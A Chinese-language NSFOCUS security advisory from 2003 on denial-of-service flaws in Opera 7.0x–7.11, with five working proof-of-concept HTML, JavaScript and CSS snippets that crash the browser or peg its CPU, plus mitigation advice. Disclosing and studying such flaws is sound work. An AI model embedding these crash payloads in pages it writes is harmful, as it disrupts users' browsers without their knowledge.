安全研究

安全漏洞
Opera多个拒绝服务攻击漏洞

发布日期:2003-06-30
更新日期:2003-07-07

受影响系统:
Opera Software Opera Web Browser 7.11b
Opera Software Opera Web Browser 7.11
Opera Software Opera Web Browser 7.10
Opera Software Opera Web Browser 7.03 win32
描述:
BUGTRAQ  ID: 8066

Opera是一款多平台的WEB浏览器。

Opera在处理部分HTML代码时存在问题,远程攻击者可以利用这个漏洞使Opera停止响应。

当浏览器尝试对包含畸形代码的文档进行解析时,可导致浏览器崩溃或停止响应。此漏洞正式存在于Windows下的Opera系统,其他版本还不确定是否受此漏洞影响。

<*来源::: Operash ::.
  
  链接:http://www.securityfocus.com/bid/8066
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

[ CODE 1 ]

12个字节数据 "<!DOCTYPE" + NULL(\x00) + 1byte + ">"可导致CPU达到100%并停止响应:

-----------------------------------------------------------------
<!DOCTYPE[\x00]A>
-----------------------------------------------------------------

[ CODE 2 ]

异常终止:

-----------------------------------------------------------------
<form></form><script>document.forms[0].submit()</script>
-----------------------------------------------------------------

[ CODE 3 ]

异常终止:

-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------

[ CODE 4 ]

异常终止:

-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------

[ CODE 5 ]

CPU利用率会达到100%:

-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 关闭JavaScript和CSS Author Mode。

厂商补丁:

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.opera.com

浏览次数:2776
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障